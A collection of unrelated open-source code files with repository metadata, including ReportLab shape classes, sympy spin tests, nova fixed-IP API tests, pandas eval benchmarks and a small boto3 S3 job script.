        if hasattr(obj,'add') and ivc:
            # Valid children go through the group's add/insert machinery.
            if pos:
                obj.insert(pos,value,name)
            else:
                obj.add(value,name)
        elif name:
            setattr(obj,name,value)
        else:
            raise ValueError, "Can't add, need name"
class LineShape(Shape):
    # base for types of lines

    _attrMap = AttrMap(
        strokeColor = AttrMapValue(isColorOrNone),
        strokeWidth = AttrMapValue(isNumber),
        strokeLineCap = AttrMapValue(None),
        strokeLineJoin = AttrMapValue(None),
        strokeMiterLimit = AttrMapValue(isNumber),
        strokeDashArray = AttrMapValue(isListOfNumbersOrNone),
        )

    def __init__(self, kw):
        # Takes a plain dict (not **kw): subclasses forward their keyword
        # dicts here after consuming their positional arguments.
        self.strokeColor = STATE_DEFAULTS['strokeColor']
        self.strokeWidth = 1
        self.strokeLineCap = 0
        self.strokeLineJoin = 0
        self.strokeMiterLimit = 0
        self.strokeDashArray = None
        self.setProperties(kw)
class Line(LineShape):
    """Straight line segment from (x1, y1) to (x2, y2)."""

    _attrMap = AttrMap(BASE=LineShape,
        x1 = AttrMapValue(isNumber),
        y1 = AttrMapValue(isNumber),
        x2 = AttrMapValue(isNumber),
        y2 = AttrMapValue(isNumber),
        )

    def __init__(self, x1, y1, x2, y2, **kw):
        LineShape.__init__(self, kw)
        self.x1 = x1
        self.y1 = y1
        self.x2 = x2
        self.y2 = y2

    def getBounds(self):
        "Returns bounding rectangle of object as (x1,y1,x2,y2)"
        # NOTE: returns the raw endpoints un-normalised (x1 may exceed x2).
        return (self.x1, self.y1, self.x2, self.y2)
class SolidShape(LineShape):
    """Abstract base for shapes that have an interior fill as well as an
    outline stroke."""
    _attrMap = AttrMap(BASE=LineShape,
        fillColor = AttrMapValue(isColorOrNone),
        )

    def __init__(self, kw):
        self.fillColor = STATE_DEFAULTS['fillColor']
        # Call the parent last so the caller's keywords override the
        # default fill colour set above.
        LineShape.__init__(self, kw)
# path operator constants
_MOVETO, _LINETO, _CURVETO, _CLOSEPATH = range(4)
_PATH_OP_ARG_COUNT = (2, 2, 6, 0) # [moveTo, lineTo, curveTo, closePath]
_PATH_OP_NAMES=['moveTo','lineTo','curveTo','closePath']

def _renderPath(path, drawFuncs):
    """Helper function for renderers: replay *path* through *drawFuncs*.

    path      -- object with flat .points and .operators lists (a Path)
    drawFuncs -- indexable mapping from operator code to a callable taking
                 that operator's coordinate arguments

    Returns true when every moveTo was balanced by a closePath, i.e. the
    path consists only of closed sub-paths (used by renderers to decide
    whether filling makes sense).
    """
    # this could be a method of Path...
    points = path.points
    i = 0
    hadClosePath = 0
    hadMoveTo = 0
    for op in path.operators:
        nArgs = _PATH_OP_ARG_COUNT[op]
        j = i + nArgs
        # star-call replaces the Python-2-only apply(); same semantics
        drawFuncs[op](*points[i:j])
        i = j
        if op == _CLOSEPATH:
            hadClosePath = hadClosePath + 1
        if op == _MOVETO:
            hadMoveTo = hadMoveTo + 1
    return hadMoveTo == hadClosePath
class Path(SolidShape):
    """A path assembled from straight lines and cubic bezier curves.

    Geometry is stored as a flat coordinate list (``points``) plus a
    parallel list of operator codes (``operators``); the two lists are
    extended in lockstep by moveTo/lineTo/curveTo/closePath.
    """
    _attrMap = AttrMap(BASE=SolidShape,
        points = AttrMapValue(isListOfNumbers),
        operators = AttrMapValue(isListOfNumbers),
        isClipPath = AttrMapValue(isBoolean),
        )

    def __init__(self, points=None, operators=None, isClipPath=0, **kw):
        SolidShape.__init__(self, kw)
        points = [] if points is None else points
        operators = [] if operators is None else operators
        assert len(points) % 2 == 0, 'Point list must have even number of elements!'
        self.points = points
        self.operators = operators
        self.isClipPath = isClipPath

    def copy(self):
        dup = self.__class__(self.points[:], self.operators[:])
        dup.setProperties(self.getProperties())
        return dup

    def moveTo(self, x, y):
        self.operators.append(_MOVETO)
        self.points.extend([x, y])

    def lineTo(self, x, y):
        self.operators.append(_LINETO)
        self.points.extend([x, y])

    def curveTo(self, x1, y1, x2, y2, x3, y3):
        self.operators.append(_CURVETO)
        self.points.extend([x1, y1, x2, y2, x3, y3])

    def closePath(self):
        self.operators.append(_CLOSEPATH)

    def getBounds(self):
        "Bounding box of the path's control points as (x1, y1, x2, y2)."
        return getPathBounds(self.points)
EmptyClipPath=Path() #special path: shared sentinel meaning "no clipping operations"
def getArcPoints(centerx, centery, radius, startangledegrees, endangledegrees, yradius=None, degreedelta=None, reverse=None):
    """Approximate an (elliptical) arc as a list of (x, y) tuples.

    centerx, centery -- centre of the ellipse carrying the arc
    radius           -- horizontal semi-axis; yradius defaults to radius
    start/end angles -- in degrees, anticlockwise; the end angle is bumped
                        by 360 until it is >= the start angle
    degreedelta      -- approximate angular step per sample (default 1 deg)
    reverse          -- if true, return the points end-to-start

    Always returns at least one point: a (near-)zero sweep yields just the
    start point.
    """
    if yradius is None: yradius = radius
    points = []
    from math import sin, cos, pi
    degreestoradians = pi/180.0
    startangle = startangledegrees*degreestoradians
    endangle = endangledegrees*degreestoradians
    while endangle<startangle:
        endangle = endangle+2*pi
    angle = float(endangle - startangle)
    a = points.append
    if angle>.001:
        degreedelta = min(angle,degreedelta or 1.)
        radiansdelta = degreedelta*degreestoradians
        # whole number of steps, then +1 so both arc ends are sampled
        n = max(int(angle/radiansdelta+0.5),1)
        radiansdelta = angle/n
        n += 1
    else:
        n = 1
        radiansdelta = 0
    # range() replaces the Python-2-only xrange(); behaviour in a for loop
    # is identical and the module stays importable on Python 3.
    for angle in range(n):
        angle = startangle+angle*radiansdelta
        a((centerx+radius*cos(angle),centery+yradius*sin(angle)))
    if reverse: points.reverse()
    return points
class ArcPath(Path):
    '''A Path with a convenience method for appending circular/elliptical arcs.'''
    def addArc(self, centerx, centery, radius, startangledegrees, endangledegrees, yradius=None, degreedelta=None, moveTo=None, reverse=None):
        # Sample the arc, then emit a moveTo for the first point when asked
        # to (or when the path is still empty) and lineTo for the rest.
        pts = getArcPoints(centerx, centery, radius, startangledegrees, endangledegrees,
                           yradius=yradius, degreedelta=degreedelta, reverse=reverse)
        if moveTo or not len(self.operators):
            firstx, firsty = pts.pop(0)
            self.moveTo(firstx, firsty)
        for x, y in pts:
            self.lineTo(x, y)
def definePath(pathSegs=[],isClipPath=0, dx=0, dy=0, **kw):
    """Build a Path from a sequence of segments.

    Each segment is either a bare operator name ('closePath') or a
    (opName, arg1, arg2, ...) list/tuple; dx/dy shift all x and y
    coordinates respectively.  Raises ValueError for an unknown operator
    name or a wrong argument count.  (pathSegs is only iterated, never
    mutated, so the mutable default is safe here.)
    """
    O = []
    P = []
    for seg in pathSegs:
        if type(seg) not in (ListType, TupleType):
            opName = seg
            args = []
        else:
            opName = seg[0]
            args = seg[1:]
        if opName not in _PATH_OP_NAMES:
            # parenthesised raise: statement form is invalid on Python 3
            raise ValueError('bad operator name %s' % opName)
        op = _PATH_OP_NAMES.index(opName)
        if len(args) != _PATH_OP_ARG_COUNT[op]:
            raise ValueError('%s bad arguments %s' % (opName, str(args)))
        O.append(op)
        P.extend(list(args))
    # apply the (dx, dy) offset to alternating coordinates
    for d, o in (dx, 0), (dy, 1):
        for i in range(o, len(P), 2):
            P[i] = P[i] + d
    # direct call replaces the Python-2-only apply()
    return Path(P, O, isClipPath, **kw)
class Rect(SolidShape):
    """An axis-aligned rectangle, optionally with rounded corners (rx, ry)."""
    _attrMap = AttrMap(BASE=SolidShape,
        x = AttrMapValue(isNumber),
        y = AttrMapValue(isNumber),
        width = AttrMapValue(isNumber),
        height = AttrMapValue(isNumber),
        rx = AttrMapValue(isNumber),
        ry = AttrMapValue(isNumber),
        )

    def __init__(self, x, y, width, height, rx=0, ry=0, **kw):
        SolidShape.__init__(self, kw)
        self.x, self.y = x, y
        self.width, self.height = width, height
        self.rx, self.ry = rx, ry

    def copy(self):
        dup = self.__class__(self.x, self.y, self.width, self.height)
        dup.setProperties(self.getProperties())
        return dup

    def getBounds(self):
        "Bounding box (ignoring corner rounding) as (x1, y1, x2, y2)."
        return (self.x, self.y, self.x + self.width, self.y + self.height)
class Image(SolidShape):
    """Bitmap image placed at (x, y) with optional width/height scaling.

    path is whatever the renderer accepts (typically a filename or an
    already-loaded image object); width/height may be None to use the
    image's natural size at render time.
    """
    _attrMap = AttrMap(BASE=SolidShape,
        x = AttrMapValue(isNumber),
        y = AttrMapValue(isNumber),
        width = AttrMapValue(isNumberOrNone),
        height = AttrMapValue(isNumberOrNone),
        path = AttrMapValue(None),
        )

    def __init__(self, x, y, width, height, path, **kw):
        SolidShape.__init__(self, kw)
        self.x = x
        self.y = y
        self.width = width
        self.height = height
        self.path = path

    def copy(self):
        new = self.__class__(self.x, self.y, self.width, self.height, self.path)
        new.setProperties(self.getProperties())
        return new

    def getBounds(self):
        # Bug fix: the original referenced the bare name ``width`` (a
        # NameError at runtime) and used width for the vertical extent;
        # use the instance's width and height respectively.
        return (self.x, self.y, self.x + self.width, self.y + self.height)
class Circle(SolidShape):
    """A circle of radius r centred on (cx, cy)."""
    _attrMap = AttrMap(BASE=SolidShape,
        cx = AttrMapValue(isNumber),
        cy = AttrMapValue(isNumber),
        r = AttrMapValue(isNumber),
        )

    def __init__(self, cx, cy, r, **kw):
        SolidShape.__init__(self, kw)
        self.cx, self.cy, self.r = cx, cy, r

    def copy(self):
        dup = self.__class__(self.cx, self.cy, self.r)
        dup.setProperties(self.getProperties())
        return dup

    def getBounds(self):
        "Bounding square as (x1, y1, x2, y2)."
        return (self.cx - self.r, self.cy - self.r, self.cx + self.r, self.cy + self.r)
class Ellipse(SolidShape):
    """An axis-aligned ellipse centred on (cx, cy) with semi-axes rx, ry."""
    _attrMap = AttrMap(BASE=SolidShape,
        cx = AttrMapValue(isNumber),
        cy = AttrMapValue(isNumber),
        rx = AttrMapValue(isNumber),
        ry = AttrMapValue(isNumber),
        )

    def __init__(self, cx, cy, rx, ry, **kw):
        SolidShape.__init__(self, kw)
        self.cx, self.cy = cx, cy
        self.rx, self.ry = rx, ry

    def copy(self):
        dup = self.__class__(self.cx, self.cy, self.rx, self.ry)
        dup.setProperties(self.getProperties())
        return dup

    def getBounds(self):
        "Bounding box as (x1, y1, x2, y2)."
        return (self.cx - self.rx, self.cy - self.ry, self.cx + self.rx, self.cy + self.ry)
class Wedge(SolidShape):
    """A "slice of a pie": the region swept anticlockwise from
    startangledegrees to endangledegrees at distance radius from
    (centerx, centery).  yradius makes the outer edge elliptical;
    radius1/yradius1 add an inner edge, giving an annular wedge.
    Rendering works by converting to a Polygon via asPolygon()."""
    _attrMap = AttrMap(BASE=SolidShape,
        centerx = AttrMapValue(isNumber),
        centery = AttrMapValue(isNumber),
        radius = AttrMapValue(isNumber),
        startangledegrees = AttrMapValue(isNumber),
        endangledegrees = AttrMapValue(isNumber),
        yradius = AttrMapValue(isNumberOrNone),
        radius1 = AttrMapValue(isNumberOrNone),
        yradius1 = AttrMapValue(isNumberOrNone),
        )
    degreedelta = 1 # jump every 1 degrees
    def __init__(self, centerx, centery, radius, startangledegrees, endangledegrees, yradius=None, **kw):
        SolidShape.__init__(self, kw)
        # normalise so the sweep always runs anticlockwise (end >= start)
        while endangledegrees<startangledegrees:
            endangledegrees = endangledegrees+360
        #print "__init__"
        self.centerx, self.centery, self.radius, self.startangledegrees, self.endangledegrees = \
            centerx, centery, radius, startangledegrees, endangledegrees
        self.yradius = yradius
    def _xtraRadii(self):
        # Resolve the optional elliptical/inner radii, falling back to the
        # main radius.  getattr guards: these attributes may never have
        # been assigned on older/hand-built instances.
        yradius = getattr(self, 'yradius', None)
        if yradius is None: yradius = self.radius
        radius1 = getattr(self,'radius1', None)
        yradius1 = getattr(self,'yradius1',radius1)
        if radius1 is None: radius1 = yradius1
        return yradius, radius1, yradius1
    #def __repr__(self):
    #        return "Wedge"+repr((self.centerx, self.centery, self.radius, self.startangledegrees, self.endangledegrees ))
    #__str__ = __repr__
    def asPolygon(self):
        """Approximate the wedge as a Polygon, stepping roughly
        self.degreedelta degrees per segment."""
        #print "asPolygon"
        centerx= self.centerx
        centery = self.centery
        radius = self.radius
        yradius, radius1, yradius1 = self._xtraRadii()
        startangledegrees = self.startangledegrees
        endangledegrees = self.endangledegrees
        from math import sin, cos, pi
        degreestoradians = pi/180.0
        startangle = startangledegrees*degreestoradians
        endangle = endangledegrees*degreestoradians
        while endangle<startangle:
            endangle = endangle+2*pi
        angle = float(endangle-startangle)
        points = []
        if angle>0.001:
            degreedelta = min(self.degreedelta or 1.,angle)
            radiansdelta = degreedelta*degreestoradians
            # number of segments; +1 below so both end angles are sampled
            n = max(1,int(angle/radiansdelta+0.5))
            radiansdelta = angle/n
            n += 1
        else:
            # degenerate sweep: emit a single point at the start angle
            n = 1
            radiansdelta = 0
        CA = []
        CAA = CA.append
        a = points.append
        # precompute unit-circle samples once; reused for the outer edge
        # and (reversed) for the optional inner edge
        for angle in xrange(n):
            angle = startangle+angle*radiansdelta
            CAA((cos(angle),sin(angle)))
        for c,s in CA:
            a(centerx+radius*c)
            a(centery+yradius*s)
        if (radius1==0 or radius1 is None) and (yradius1==0 or yradius1 is None):
            # plain pie slice: close the outline through the centre point
            a(centerx); a(centery)
        else:
            # annular wedge: trace the inner edge back the opposite way
            CA.reverse()
            for c,s in CA:
                a(centerx+radius1*c)
                a(centery+yradius1*s)
        return Polygon(points)
    def copy(self):
        # Radii/angle extras not in the constructor are carried across by
        # setProperties (they are all declared in _attrMap).
        new = self.__class__(self.centerx,
                self.centery,
                self.radius,
                self.startangledegrees,
                self.endangledegrees)
        new.setProperties(self.getProperties())
        return new
    def getBounds(self):
        return self.asPolygon().getBounds()
class Polygon(SolidShape):
    """Defines a closed shape; Is implicitly
    joined back to the start for you.

    points is a flat list [x0, y0, x1, y1, ...].
    """
    _attrMap = AttrMap(BASE=SolidShape,
        points = AttrMapValue(isListOfNumbers),
        )

    def __init__(self, points=None, **kw):
        SolidShape.__init__(self, kw)
        # Default changed from a [] literal to None: the mutable default
        # list was stored directly on the instance, so every Polygon built
        # without explicit points aliased the same shared list.
        if points is None:
            points = []
        assert len(points) % 2 == 0, 'Point list must have even number of elements!'
        self.points = points

    def copy(self):
        new = self.__class__(self.points)
        new.setProperties(self.getProperties())
        return new

    def getBounds(self):
        return getPointsBounds(self.points)
class PolyLine(LineShape):
    """Series of line segments. Does not define a
    closed shape; never filled even if apparently joined.
    Put the numbers in the list, not two-tuples (although a list of
    (x, y) pairs is accepted and flattened).
    """
    _attrMap = AttrMap(BASE=LineShape,
        points = AttrMapValue(isListOfNumbers),
        )

    def __init__(self, points=None, **kw):
        LineShape.__init__(self, kw)
        # Default changed from a [] literal to None: the mutable default
        # list was stored directly on the instance, so every PolyLine built
        # without explicit points aliased the same shared list.
        if points is None:
            points = []
        lenPoints = len(points)
        if lenPoints:
            if type(points[0]) in (ListType, TupleType):
                # flatten a sequence of (x, y) pairs into a flat list
                L = []
                for (x, y) in points:
                    L.append(x)
                    L.append(y)
                points = L
            else:
                assert len(points) % 2 == 0, 'Point list must have even number of elements!'
        self.points = points

    def copy(self):
        new = self.__class__(self.points)
        new.setProperties(self.getProperties())
        return new

    def getBounds(self):
        return getPointsBounds(self.points)
class String(Shape):
    """A single-line text string drawn at (x, y).

    textAnchor may be 'start', 'middle' or 'end', placing the given x at
    the left edge, centre or right edge of the rendered text.
    """
    # to do.
    _attrMap = AttrMap(
        x = AttrMapValue(isNumber),
        y = AttrMapValue(isNumber),
        text = AttrMapValue(isString),
        fontName = AttrMapValue(None),
        fontSize = AttrMapValue(isNumber),
        fillColor = AttrMapValue(isColorOrNone),
        textAnchor = AttrMapValue(isTextAnchor),
        encoding = AttrMapValue(isString),
        )

    # class-level default, overridable per instance or via keywords
    encoding = 'utf8'

    def __init__(self, x, y, text, **kw):
        self.x = x
        self.y = y
        self.text = text
        self.textAnchor = 'start'
        self.fontName = STATE_DEFAULTS['fontName']
        self.fontSize = STATE_DEFAULTS['fontSize']
        self.fillColor = STATE_DEFAULTS['fillColor']
        # keywords override the defaults assigned above
        self.setProperties(kw)

    def getEast(self):
        "x coordinate of the right-hand end of the rendered text."
        return self.x + stringWidth(self.text, self.fontName, self.fontSize, self.encoding)

    def copy(self):
        dup = self.__class__(self.x, self.y, self.text)
        dup.setProperties(self.getProperties())
        return dup

    def getBounds(self):
        # assumes a constant drop of 0.2*fontSize below the baseline
        width = stringWidth(self.text, self.fontName, self.fontSize, self.encoding)
        if self.textAnchor == 'start':
            left = self.x
        elif self.textAnchor == 'middle':
            left = self.x - 0.5*width
        elif self.textAnchor == 'end':
            left = self.x - width
        return (left, self.y - 0.2 * self.fontSize, left + width, self.y + self.fontSize)
class UserNode(_DrawTimeResizeable):
    """A simple template for creating a new node. The user (Python
    programmer) may subclasses this. provideNode() must be defined to
    provide a Shape primitive when called by a renderer. It does
    NOT inherit from Shape, as the renderer always replaces it, and
    your own classes can safely inherit from it without getting
    lots of unintended behaviour."""

    def provideNode(self):
        """Override this to create your own node. This lets widgets be
        added to drawings; they must create a shape (typically a group)
        so that the renderer can draw the custom node."""
        # Parenthesised raise: the old 'raise E, msg' statement form is
        # invalid syntax on Python 3.
        raise NotImplementedError("this method must be redefined by the user/programmer")
def test():
    """Manual smoke test: build a Rect, dump and verify its properties,
    then delete a required attribute and verify again (the second verify
    is expected to fail because width is mandatory)."""
    r = Rect(10,10,200,50)
    import pprint
    pp = pprint.pprint
    print 'a Rectangle:'
    pp(r.getProperties())
    print
    print 'verifying...',
    r.verify()
    print 'OK'
    #print 'setting rect.z = "spam"'
    #r.z = 'spam'
    print 'deleting rect.width'
    del r.width
    print 'verifying...',
    # NOTE(review): this verify should raise, demonstrating validation of
    # required attributes.
    r.verify()

if __name__=='__main__':
    test()
| {
"content_hash": "fdaab552dd6016505cf0c58512b53f8b",
"timestamp": "",
"source": "github",
"line_count": 1301,
"max_line_length": 159,
"avg_line_length": 35.32436587240584,
"alnum_prop": 0.5757338381530561,
"repo_name": "alexissmirnov/donomo",
"id": "03622906110ef2a6c608341fc8aeddba6656bbb1",
"size": "46145",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "donomo_archive/lib/reportlab/graphics/shapes.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "JavaScript",
"bytes": "360712"
},
{
"name": "Python",
"bytes": "7155992"
},
{
"name": "Shell",
"bytes": "391"
}
],
"symlink_target": ""
} |
import gettext
from core import config
# Module-wide translation shortcut: _(msg) returns the translation of msg
# from the 'message' domain located under config.localesDir.
# NOTE(review): .ugettext exists only on Python 2; Python 3's gettext
# exposes .gettext instead -- confirm the target interpreter.
_ = gettext.translation('message', config.localesDir).ugettext
| {
"content_hash": "b80127905ef7b25b7a97b6eb4de86d1c",
"timestamp": "",
"source": "github",
"line_count": 4,
"max_line_length": 62,
"avg_line_length": 25.75,
"alnum_prop": 0.7961165048543689,
"repo_name": "rrpg/world-editor",
"id": "adb175f6af5f1925db6dfebe221c45a97f2f6654",
"size": "103",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "core/localisation.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Makefile",
"bytes": "3511"
},
{
"name": "Python",
"bytes": "73427"
},
{
"name": "Shell",
"bytes": "80"
}
],
"symlink_target": ""
} |
from sympy import I, Matrix
from sympy.physics.quantum import hbar, represent, Commutator
from sympy.physics.quantum import apply_operators
from sympy.physics.quantum.spin import *
def test_represent():
    """Matrix representation of Jz for j=1/2 (default) and j=1."""
    half_expected = hbar*Matrix([[1, 0], [0, -1]])/2
    assert represent(Jz) == half_expected
    one_expected = hbar*Matrix([[1, 0, 0], [0, 0, 0], [0, 0, -1]])
    assert represent(Jz, j=1) == one_expected
def test_jplus():
    """Basic algebraic properties of the raising operator J+."""
    # commutator identity: [J+, J-] = 2*hbar*Jz
    assert Commutator(Jplus, Jminus).doit() == 2*hbar*Jz
    # J+ annihilates the top state |1, 1>
    assert apply_operators(Jplus*JzKet(1, 1)) == 0
    assert Jplus.matrix_element(1, 1, 1, 1) == 0
    # Cartesian decomposition: J+ = Jx + i*Jy
    assert Jplus.rewrite('xyz') == Jx + I*Jy
| {
"content_hash": "b45df0a426bbaac450b64c9b84ae600a",
"timestamp": "",
"source": "github",
"line_count": 16,
"max_line_length": 72,
"avg_line_length": 34.625,
"alnum_prop": 0.6750902527075813,
"repo_name": "tarballs-are-good/sympy",
"id": "47dacc3ea6da5a173554c3438b4361fa9bace3db",
"size": "554",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "sympy/physics/quantum/tests/test_spin.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [],
"symlink_target": ""
} |
from oslo_config import cfg
from nova import exception
from nova.tests.functional.api_sample_tests import test_servers
from nova.tests.unit.objects import test_network
from nova.tests.unit import utils as test_utils
CONF = cfg.CONF
# Register the legacy v2 extension-list option before the test flags
# below (in FixedIpTest._get_flags) copy and append to it.
CONF.import_opt('osapi_compute_extension',
                'nova.api.openstack.compute.legacy_v2.extensions')
class FixedIpTest(test_servers.ServersSampleBase):
    """API sample tests for the os-fixed-ips extension (show / reserve)."""
    extension_name = "os-fixed-ips"
    # None selects the plain (non-microversioned) API; subclasses override.
    microversion = None

    def _get_flags(self):
        # Enable the legacy v2 Fixed_ips extension on top of the base flags.
        f = super(FixedIpTest, self)._get_flags()
        f['osapi_compute_extension'] = CONF.osapi_compute_extension[:]
        f['osapi_compute_extension'].append(
            'nova.api.openstack.compute.contrib.fixed_ips.Fixed_ips')
        return f

    def setUp(self):
        """Stub the fixed-ip DB API calls with two in-memory fixture rows."""
        super(FixedIpTest, self).setUp()
        instance = dict(test_utils.get_test_instance(),
                        hostname='openstack', host='host')
        fake_fixed_ips = [{'id': 1,
                           'address': '192.168.1.1',
                           'network_id': 1,
                           'virtual_interface_id': 1,
                           'instance_uuid': '1',
                           'allocated': False,
                           'leased': False,
                           'reserved': False,
                           'created_at': None,
                           'deleted_at': None,
                           'updated_at': None,
                           'deleted': None,
                           'instance': instance,
                           'network': test_network.fake_network,
                           'host': None},
                          {'id': 2,
                           'address': '192.168.1.2',
                           'network_id': 1,
                           'virtual_interface_id': 2,
                           'instance_uuid': '2',
                           'allocated': False,
                           'leased': False,
                           'reserved': False,
                           'created_at': None,
                           'deleted_at': None,
                           'updated_at': None,
                           'deleted': None,
                           'instance': instance,
                           'network': test_network.fake_network,
                           'host': None},
                          ]

        def fake_fixed_ip_get_by_address(context, address,
                                         columns_to_join=None):
            # In-memory replacement for nova.db.fixed_ip_get_by_address.
            for fixed_ip in fake_fixed_ips:
                if fixed_ip['address'] == address:
                    return fixed_ip
            raise exception.FixedIpNotFoundForAddress(address=address)

        def fake_fixed_ip_update(context, address, values):
            # In-memory replacement for nova.db.fixed_ip_update: look the
            # row up, then apply the given values in place.
            fixed_ip = fake_fixed_ip_get_by_address(context, address)
            if fixed_ip is None:
                raise exception.FixedIpNotFoundForAddress(address=address)
            else:
                for key in values:
                    fixed_ip[key] = values[key]

        self.stub_out("nova.db.fixed_ip_get_by_address",
                      fake_fixed_ip_get_by_address)
        self.stub_out("nova.db.fixed_ip_update", fake_fixed_ip_update)

    def test_fixed_ip_reserve(self):
        # Reserve a Fixed IP.
        response = self._do_post('os-fixed-ips/192.168.1.1/action',
                                 'fixedip-post-req', {},
                                 api_version=self.microversion)
        self.assertEqual(202, response.status_code)
        self.assertEqual("", response.content)

    def _test_get_fixed_ip(self, **kwargs):
        # Return data about the given fixed ip.  kwargs lets microversion
        # subclasses add expected response fields (e.g. 'reserved' in 2.4).
        response = self._do_get('os-fixed-ips/192.168.1.1',
                                api_version=self.microversion)
        project = {'cidr': '192.168.1.0/24',
                   'hostname': 'openstack',
                   'host': 'host',
                   'address': '192.168.1.1'}
        project.update(**kwargs)
        self._verify_response('fixedips-get-resp', project, response, 200)

    def test_get_fixed_ip(self):
        self._test_get_fixed_ip()
class FixedIpV24Test(FixedIpTest):
    """Re-run the fixed-ip samples against microversion 2.4."""
    microversion = '2.4'
    # NOTE(gmann): microversion tests do not need to run for v2 API
    # so defining scenarios only for v2.4 which will run the original tests
    # by appending '(v2_4)' in test_id.
    scenarios = [('v2_4', {'api_major_version': 'v2.1'})]

    def test_get_fixed_ip(self):
        # v2.4 adds the 'reserved' field to the GET response.
        self._test_get_fixed_ip(reserved=False)
| {
"content_hash": "d810a937e3f8a6f1d78c7d669ec96686",
"timestamp": "",
"source": "github",
"line_count": 112,
"max_line_length": 75,
"avg_line_length": 38.24107142857143,
"alnum_prop": 0.5199626430072379,
"repo_name": "dims/nova",
"id": "2cf6b10bd2ec5a9bd089624d067d63675feb4fbf",
"size": "4885",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "nova/tests/functional/api_sample_tests/test_fixed_ips.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "16952469"
},
{
"name": "Shell",
"bytes": "36658"
},
{
"name": "Smarty",
"bytes": "317320"
}
],
"symlink_target": ""
} |
import sys
import boto3
def testJob(txtfile):
with open(txtfile, "r") as f:
newFile = open("output.txt", "w")
newFile.write(str(f.readline()) + "WORLD")
newFile.close()
return newFile.name
def getData(key, datadir):
    """Download *key* from the 'nddtestbucket' S3 bucket into *datadir*
    and return the local file path.
    """
    s3 = boto3.resource('s3')
    filename = datadir + '/' + key
    # download_file returns None; the original bound it to an unused local.
    s3.meta.client.download_file('nddtestbucket', key, filename)
    return filename
def uploadResults(key, results):
    """Upload the *results* file to the 'nddtestbucketresults' S3 bucket.

    The object key is derived from *key*: '<stem>results.txt'.  Returns
    the derived key.
    """
    s3 = boto3.resource('s3')
    key = key.split(".")[0] + 'results' + '.txt'
    # The original opened the file and never closed it; a context manager
    # guarantees the handle is released after the upload.
    with open(results, 'rb') as data:
        s3.Bucket('nddtestbucketresults').put_object(Key=key, Body=data)
    return key
# Script entry point: sys.argv[1] is the S3 object key to process.
# NOTE(review): this runs on import as well as direct execution --
# consider wrapping in an ``if __name__ == '__main__':`` guard.
output = testJob(getData(sys.argv[1], 'data'))
uploadResults(sys.argv[1], output)
| {
"content_hash": "57ad368568b5ba4444d589a0b1f3e893",
"timestamp": "",
"source": "github",
"line_count": 25,
"max_line_length": 71,
"avg_line_length": 28.72,
"alnum_prop": 0.6364902506963789,
"repo_name": "NeuroDataDesign/pan-synapse",
"id": "4b8b8387c81b61ca57a6485c1ccf4514dda2b34b",
"size": "718",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "pipeline_1/code/service/cloud/testjob.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "22326"
},
{
"name": "HTML",
"bytes": "22226"
},
{
"name": "Jupyter Notebook",
"bytes": "183044371"
},
{
"name": "Python",
"bytes": "95352"
}
],
"symlink_target": ""
} |
import numpy as np
import pandas as pd
try:
import pandas.core.computation.expressions as expr
except ImportError:
import pandas.computation.expressions as expr
class Eval:
    """ASV benchmarks for pd.eval arithmetic/boolean expressions, run
    against both engines and with 1 or all numexpr threads."""
    params = [["numexpr", "python"], [1, "all"]]
    param_names = ["engine", "threads"]

    def setup(self, engine, threads):
        # four independent 20000x100 random frames for the expressions below
        frames = [pd.DataFrame(np.random.randn(20000, 100)) for _ in range(4)]
        self.df, self.df2, self.df3, self.df4 = frames
        if threads == 1:
            expr.set_numexpr_threads(1)

    def time_add(self, engine, threads):
        pd.eval("self.df + self.df2 + self.df3 + self.df4", engine=engine)

    def time_and(self, engine, threads):
        pd.eval(
            "(self.df > 0) & (self.df2 > 0) & (self.df3 > 0) & (self.df4 > 0)",
            engine=engine,
        )

    def time_chained_cmp(self, engine, threads):
        pd.eval("self.df < self.df2 < self.df3 < self.df4", engine=engine)

    def time_mult(self, engine, threads):
        pd.eval("self.df * self.df2 * self.df3 * self.df4", engine=engine)

    def teardown(self, engine, threads):
        # restore the default thread count
        expr.set_numexpr_threads()
class Query:
    """ASV benchmarks for DataFrame.query with datetime and boolean filters."""

    def setup(self):
        size = 10 ** 6
        midpoint = (size // 2) - 1
        index = pd.date_range("20010101", periods=size, freq="T")
        # a timestamp from the middle of the range, used as the threshold
        self.ts = pd.Series(index).iloc[midpoint]
        self.df = pd.DataFrame({"a": np.random.randn(size), "dates": index}, index=index)
        sample = np.random.randn(size)
        self.min_val = sample.min()
        self.max_val = sample.max()

    def time_query_datetime_index(self):
        self.df.query("index < @self.ts")

    def time_query_datetime_column(self):
        self.df.query("dates < @self.ts")

    def time_query_with_boolean_selection(self):
        self.df.query("(a >= @self.min_val) & (a <= @self.max_val)")
from .pandas_vb_common import setup # noqa: F401 isort:skip
| {
"content_hash": "cf5bf4fe56ebd47195d4b59cbacb5d3e",
"timestamp": "",
"source": "github",
"line_count": 66,
"max_line_length": 86,
"avg_line_length": 30.136363636363637,
"alnum_prop": 0.5922574157868276,
"repo_name": "TomAugspurger/pandas",
"id": "cbab9fdc9c0baeec0a126a670595a98a52e2e3a7",
"size": "1989",
"binary": false,
"copies": "7",
"ref": "refs/heads/main",
"path": "asv_bench/benchmarks/eval.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Batchfile",
"bytes": "257"
},
{
"name": "C",
"bytes": "352075"
},
{
"name": "CSS",
"bytes": "979"
},
{
"name": "Cython",
"bytes": "1029090"
},
{
"name": "Dockerfile",
"bytes": "1756"
},
{
"name": "HTML",
"bytes": "454789"
},
{
"name": "Makefile",
"bytes": "473"
},
{
"name": "Python",
"bytes": "14680580"
},
{
"name": "Shell",
"bytes": "31513"
},
{
"name": "Smarty",
"bytes": "2126"
}
],
"symlink_target": ""
} |
from nssrc.com.citrix.netscaler.nitro.resource.base.base_resource import base_resource
from nssrc.com.citrix.netscaler.nitro.resource.base.base_resource import base_response
from nssrc.com.citrix.netscaler.nitro.service.options import options
